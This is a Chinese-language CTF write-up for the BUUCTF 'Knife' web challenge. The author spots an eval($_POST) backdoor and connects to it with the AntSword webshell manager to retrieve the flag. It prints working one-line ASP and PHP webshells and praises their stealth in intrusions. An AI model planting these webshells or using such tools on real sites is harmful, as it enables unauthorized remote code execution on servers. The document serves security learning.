CTF-Web-[極客大挑戰 2019]Knife

博客說明

文章所涉及的資料來自互聯網整理和個人總結，意在于個人學習和經驗匯總，如有什么地方侵權，請聯系本人刪除，謝謝！本文僅用于學習與交流，不得用于非法用途！

CTP平臺

網址

https://buuoj.cn/challenges

題目

Web類，[極客大挑戰 2019]Knife

打開題目的實例

思路

看到這種題目，首先到處點一點，看看有什么奇怪的地方，然后打開源代碼，差不多就是這樣，然后一頓操作沒有怎么發現，反而eval($_POST["Syc"])這一段比較明顯，是作為后門用post提交一個字符串Syc，剛好結合名字Knife，想起了一個東西--中國菜刀

中國菜刀

下載地址

http://xiazai.zol.com.cn/detail/44/438518.shtml

中國菜刀是一款專業的網站管理軟件，用途廣泛，使用方便，小巧實用。只要支持動態腳本的網站，都可以用中國菜刀來進行管理

一般針對于一句話木馬

一句話木馬

短小精悍，而且功能強大，隱蔽性非常好，在入侵中始終扮演著強大的作用。

常用一句話木馬如下：

asp一句話木馬：

　　 <%execute(request("value"))%>

php一句話木馬：

　　 <?php @eval($_POST[value]);?>

當然我的是mac，安裝不了菜刀，但是可以安裝另一個神器--中國蟻劍

中國蟻劍

中國蟻劍是一款開源的跨平臺網站管理工具，它主要面向于合法授權的滲透測試安全人員以及進行常規操作的網站管理員。是一款非常優秀的webshell管理工具。

核心功能

• Shell代理功能
• Shell管理
• 文件管理
• 虛擬終端
• 數據庫管理
• 插件市場
• 插件開發

下載地址

https://github.com/AntSwordProject/AntSword-Loader

下載了幾個世紀，我先睡一覺，希望明天不要就消失了

我來了，果然沒讓我失望，無效了，不過重新下載挺快的

地址

http://4343b396-4e3f-4765-b250-f4ec6443dc02.node3.buuoj.cn/Knife.php

密碼

Syc

蟻劍連接

輸入地址和密碼

在根目錄下找到flag

感謝

BUUCTF

以及勤勞的自己

總結

以上是生活随笔為你收集整理的CTF-Web-[极客大挑战 2019]Knife的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。